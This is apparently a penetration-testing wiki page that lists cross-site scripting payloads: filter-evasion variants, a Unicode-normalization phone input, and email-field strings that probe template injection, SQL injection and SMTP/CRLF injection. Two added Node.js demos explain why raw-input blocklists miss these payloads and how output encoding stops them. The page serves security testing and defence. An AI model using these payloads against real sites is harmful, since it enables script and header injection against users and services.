wiki.hackerlab.cz
XSS

Cross-Site Scripting (XSS) payloads

Generic

'';! - "<XSS>=&{()}
\'-alert(1)//
\';alert(1)//
\"-alert(1)}//
alert`xss`;
'-alert(1)-'
'}alert(1);{'
'}alert(1)%0A{'
';-alert(1)//
\'}alert(1);{//
&apos;-alert(1)-&apos;
&#x27-alert(1)-&#x27
"onmouseover="alert(1)
onerror=alert`1`
param=abc`;return+false});});alert`xss`;</script>
return+false});
});
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a;alert(1) //the ; after &#x3a is required: the "a" of alert is a hex digit and would be swallowed into the reference
<script>alert(1)</script>
<script>\u0061lert(2)</script>
<script>\u{61}lert(3)</script>
<script>\u{0000000061}lert(4)</script>
<%00script>alert(5)</script>
<script>al%00ert(6)</script>
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
<<script>alert("XSS");//<</script>
<img src=x onerror=alert(7) />
<img/src=x a='' onerror=alert(8)>
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<svg/onload=alert``>
<svg onload=alert('XSS')>
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>
<svg onload=alert(1)>
"><svg onload=alert(1)>
<svg><x><script>alert('1'&#41</x>
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>
<iframe src="javascript:alert(1)">
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{{}.")));alert(1)//"}}

Phone Inputs

10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=<𝐬𝐜𝐫𝐢𝐩𝐭>𝐚𝐥𝐞𝐫𝐭(1)</𝐬𝐜𝐫𝐢𝐩𝐭> //mathematical bold letters, NFKC-normalized to ASCII by some backends after the input filter has run
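The following is an added example, not code from the original page or from any tool it lists. It covers both the Generic list and the Phone Inputs payload above: it models three decoding layers that sit between a raw input and the sink where these payloads are interpreted (HTML character references in an attribute, javascript: URL handling, and Unicode NFKC normalization) and shows why a blocklist run on the raw input misses them. The blocklist, the entity table, the helper names and the constructed sample inputs are assumptions of this demo; it runs under Node.js.

```javascript
// Added example for this page; not code from the original page or from any
// tool it lists. The blocklist, the entity table and the samples are
// assumptions made for the demo, not a description of any real product.

// A deliberately naive, case-sensitive substring blocklist of the kind the
// payload variants are designed to slip past.
const NAIVE_BLOCKLIST = ['<script', 'javascript:', 'onerror=', 'onload='];
function naiveFilterBlocks(input) {
  return NAIVE_BLOCKLIST.some((bad) => input.includes(bad));
}

// Layer 1: HTML character references in an attribute value (e.g. href="...").
// Follows the HTML tokenizer rules that matter here: numeric references take
// as many digits as they can and the ';' is optional, named references need
// the ';'. So "&#x3aalert" yields U+03AA followed by "lert", not ":alert".
const NAMED_REFS = { colon: ':', apos: "'", quot: '"', lt: '<', gt: '>', amp: '&', Tab: '\t', NewLine: '\n' };
function decodeHtmlEntities(s) {
  return s.replace(/&#x([0-9a-f]+);?|&#([0-9]+);?|&([a-z]+);/gi, (m, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0x10ffff ? m : String.fromCodePoint(cp);
    }
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : m;
  });
}

// Layer 2: what the browser does with the decoded attribute when it is used as
// a navigation target. Tabs/newlines are stripped and surrounding whitespace
// trimmed (URL parsing), the scheme is matched case-insensitively, and for
// javascript: the body is percent-decoded before it is evaluated.
// Returns the script that would run, or null if it is not a javascript: URL.
function scriptExecutedByHref(hrefAttr) {
  const url = decodeHtmlEntities(hrefAttr).replace(/[\t\n\r]/g, '').trim();
  const m = /^([a-z][a-z0-9+.-]*):([\s\S]*)$/i.exec(url);
  if (!m || m[1].toLowerCase() !== 'javascript') return null;
  try {
    return decodeURIComponent(m[2]);
  } catch (e) {
    return m[2]; // malformed %-escape: left as-is
  }
}

// Layer 3: Unicode compatibility normalization. Mathematical bold letters are
// compatibility-equivalent to ASCII, so a backend that NFKC-normalizes text
// (phone-number "cleanup" is a typical place) turns the Phone Inputs payload
// into a literal <script> tag after the filter has already run.
function nfkcNormalize(s) {
  return s.normalize('NFKC');
}

// Builds the bold-letter variant without pasting astral characters:
// maps a-z onto U+1D41A..U+1D433 (MATHEMATICAL BOLD SMALL A..Z).
function toMathBold(s) {
  return Array.from(s, (c) => (c >= 'a' && c <= 'z'
    ? String.fromCodePoint(0x1d41a + c.charCodeAt(0) - 0x61) : c)).join('');
}

// Constructed sample inputs, taken from the shapes in the lists above.
const SAMPLES = [
  { input: 'javascript&colon;alert(1)', sink: 'href' },
  { input: 'javascript&#x003A;alert(1)', sink: 'href' },
  { input: 'JavaSCript:%61%6c%65%72%74%28%31%29', sink: 'href' },
  { input: '&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a;alert(1)', sink: 'href' },
  { input: '&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)', sink: 'href' }, // missing ';' -> dead
  { input: '10203040;' + toMathBold('phone-context=<script>alert(1)</script>'), sink: 'nfkc' },
];

// For one sample: was it blocked on the raw input, what reaches the sink, and
// is it effective there (href: JS executes; nfkc: normalized text is a live tag)?
function evaluate({ input, sink }) {
  const reachesSink = sink === 'href' ? scriptExecutedByHref(input) : nfkcNormalize(input);
  return {
    input,
    blockedRaw: naiveFilterBlocks(input),
    reachesSink,
    effective: sink === 'href' ? reachesSink !== null : naiveFilterBlocks(reachesSink),
  };
}

function runAll() {
  return SAMPLES.map(evaluate);
}

for (const r of runAll()) {
  console.log(`${r.blockedRaw ? 'BLOCKED' : 'passed '} ${r.effective ? 'EFFECTIVE' : 'dead     '} ${r.input} -> ${JSON.stringify(r.reachesSink)}`);
}
```

Every sample passes the raw-input blocklist; all but the missing-semicolon variant are still live at the sink. The fix the demo points at is to decode (or normalize) first and filter the result, or better, to encode at the output context instead of blocklisting input.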

Email Inputs

test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
"<%=7*7%>"@example.com
test+(${{7*7}})@example.com
"'OR1=1--'"@example.com
user@test.burpcollaborator.net
user@[127.0.0.1]
user@email=user@example.com
%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com\r\nRCPT TO:<victim+"@test.com
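The following is an added example, not code from the original page or from any tool it lists. It shows why the Email Inputs payloads above get through a typical address check (RFC 5322 allows quoted strings and comments in the local part, so they are syntactically fine) and what actually stops them: encoding at the HTML sink and rejecting CR/LF on the value that reaches the mailer, after any URL-decoding. The validator regex, the page template, the function names and the samples are assumptions of this demo; it runs under Node.js.

```javascript
// Added example for this page; not code from the original page or from any
// tool it lists. The regex, the template and the samples are assumptions.

// A permissive check of the kind found in many codebases: one '@', no
// whitespace, a dot somewhere in the domain part. Every payload in the
// Email Inputs list that has a single '@' satisfies it.
const LOOSE_EMAIL = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
function looksLikeEmail(addr) {
  return LOOSE_EMAIL.test(addr);
}

// Vulnerable sink: the validated address is reflected into HTML verbatim.
function renderAccountUnsafe(addr) {
  return `<p>Signed in as ${addr}</p>`;
}

// Hardened sink: HTML-encode for the element-content context. (If the value
// is instead fed to a template engine, which "<%=7*7%>" and "${{7*7}}" probe
// for, encoding does not help; the value must never be compiled as a template.)
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderAccountSafe(addr) {
  return `<p>Signed in as ${escapeHtml(addr)}</p>`;
}

// SMTP path: an address carrying CR/LF can terminate the RCPT TO line and
// inject further commands or headers. The check must run on the value that
// actually reaches the mailer, i.e. after URL-decoding; otherwise the
// "%0d%0a..." variant passes validation and is decoded later.
function safeForSmtp(addr) {
  return !/[\r\n]/.test(addr);
}

// Lenient percent-decoding: malformed escapes (e.g. "%=7") are kept as-is
// instead of throwing, which is how many frameworks behave.
function urlDecodeLenient(s) {
  try {
    return decodeURIComponent(s);
  } catch (e) {
    return s;
  }
}

// Constructed samples, taken from the shapes in the Email Inputs list above.
const EMAIL_SAMPLES = [
  'test+(<script>alert(0)</script>)@example.com',
  'test@example(<script>alert(0)</script>).com',
  '"<script>alert(0)</script>"@example.com',
  '"<%=7*7%>"@example.com',
  '"\'OR1=1--\'"@example.com',
  'user@[127.0.0.1]',
  '%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com',
];

// For each sample: does validation accept it, does the unsafe sink emit a live
// tag, does the safe sink, and does the SMTP check catch the CRLF variant once
// the app has URL-decoded it (the decode-after-validate ordering bug)?
function assess(addr) {
  return {
    addr,
    accepted: looksLikeEmail(addr),
    unsafeHtmlHasTag: /<script>/.test(renderAccountUnsafe(addr)),
    safeHtmlHasTag: /<script>/.test(renderAccountSafe(addr)),
    smtpSafe: safeForSmtp(urlDecodeLenient(addr)),
  };
}

function assessAll() {
  return EMAIL_SAMPLES.map(assess);
}

for (const r of assessAll()) {
  console.log(`${r.accepted ? 'accepted' : 'rejected'} unsafe-tag=${r.unsafeHtmlHasTag} safe-tag=${r.safeHtmlHasTag} smtp-safe=${r.smtpSafe}  ${r.addr}`);
}
```

All seven samples are accepted by the loose check, three of them produce a live <script> tag through the unsafe sink and none through the encoded one, and only the percent-encoded sample fails the SMTP check, and only once it has been decoded.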

References

XSS (Cross Site Scripting) - HackTricks
A Pentester's Guide to Cross-Site Scripting (XSS) | Cobalt Blog - Cobalt